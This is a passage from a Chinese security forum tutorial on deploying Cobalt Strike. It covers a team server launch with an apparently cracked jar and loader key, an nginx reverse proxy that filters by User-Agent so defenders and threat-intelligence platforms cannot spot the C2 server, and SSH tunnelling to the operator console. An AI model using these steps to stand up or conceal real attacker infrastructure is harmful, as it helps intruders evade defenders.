  1. 端口为 49228,只能本地访问(127.0.0.1),也使用刚刚做好的ts.store证书
复制代码

  1. # start the team server.
  2. java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=49228 -Dcobaltstrike.server_bindto=127.0.0.1 -Djavax.net.ssl.keyStore=./ts.store -Djavax.net.ssl.keyStorePassword=zsx147a -server -XX:+AggressiveHeap -XX:+UseParallelGC -classpath ./cscdf_luckone.jar -javaagent:CSAgent.jar=f38eb3d1a335b252b58bc2acde81b542 -Duser.language=en server.TeamServer $*
复制代码


启动测试
  1. ./teamserver 192.168.6.21 yyds123 jQuery_CS_4.5.profile
复制代码










4.反向代理
前面我们自定义了C2 侧写,但蓝队还是可以轻松地捕捉到我们,也有很多威胁情报平台都在持续搜集 C2 服务器,为了避免我们的C2 服务器被发现,需采取一些反制手段,反向代理是种不错的选择。

  1. 搜集了 Cobalt Strike 服务器的情报平台:
  2. https://otx.alienvault.com/pulse/62ffa9d924daca336eeaedea
  3. 从威胁情报猎人角度寻找 Cobalt Strike 基础设施的文章:
  4. https://bank-security.medium.com/hunting-cobalt-strike-servers-385c5bedda7b
复制代码


首先我们可以先把 CS服务器端口和监听器端口置于防火墙之后,这样情报平台就收集不到我们的 C2 服务器。然后通过反向代理,将CS监听器的 443 端口的流量反向转发到转发器 (Nginx,Apache2,Socat 等) 的运行端口 8443,最后再根据 URL、User Agent、Cookie等属性配置过滤规则。不符合条件的请求 ,将被重定向到不相干页面 (例如google.com、403页面、404页面)等。为了后续操作方便,我把生成的证书和密钥先分别放在/etc/ssl/certs/和/etc/ssl/private/目录下

  1. cp public.crt /etc/ssl/certs/
  2. cp private.key /etc/ssl/private/
复制代码


安装nginx
  1. sudo apt install nginx
复制代码


修改配置文件
  1. cp /etc/nginx/nginx.conf  /etc/nginx/nginx.conf.bak
  2. vim /etc/nginx/nginx.conf
复制代码


添加以下配置
  1. server {
  2.                  listen 8080;
  3.                  ssl on;
  4.                  ssl_certificate /etc/ssl/certs/public.crt;
  5.                  ssl_certificate_key /etc/ssl/private/private.key;
  6.                  server_name 192.168.6.21;
  7.                  proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
  8.                  location ~*/ {
  9.                          if ($http_user_agent != "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/517.36 (KHTML, like Gecko)") {
  10.                          return 403;
  11.                  }
  12.                  proxy_pass  https://localhost;
  13.                  }
  14.         }
复制代码


补充 :  ssl on;指令被弃用, 建议使用 listen 8080 ssl;

修改后的配置



重新加载nginx配置
  1. nginx -s reload
复制代码


如果报错



解决方案
  1. nginx -c /etc/nginx/nginx.conf
  2. nginx -s reload
复制代码


我们通过 Nginx 充当反向代理来保护CS 的监听端口所以我们在 CS 中的监听器这样设置,HTTP Port (C2) 为 Nginx 监听端口,HTTP Port (Bind) 为 Cobalt Strike 的监听器端口


测试 , 直接访问8080端口,出现了403页面我们前面配置了nginx.conf,UA头不是admin,所以跳转
  1. curl https://127.0.0.1:8080/123 -v -k
  2. curl https://127.0.0.1:8080/123 -v -k -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/517.36 (KHTML, like Gecko)"   # 设置 User-Agent: admin
复制代码






测试上线

补充 : 注意profile文件中的 useragent 要符合nginx的转发规则 , 否则是上线不了的

  1. set useragent "admin";
复制代码




5.ssl隧道
我们前面设置了只能本地(127.0.0.1)登入,所以我们可以使用ssh隧道链接

  1. ssh -L 本机端口:127.0.0.1:vps端口 root@192.168.6.21
  2.                 cs服务器ip
复制代码


示例

如果cs部署在你的vps上, 你可以在kali或者win11上运行

  1. ssh -L 8081:127.0.0.1:49228 root@192.168.6.21

  3. 就是一个端口转发, 把vps的49228转发到本地的8081上
复制代码


然后就可以在你的kali或者win11上连接cs客户端了



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 22:29 , Processed in 0.016264 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表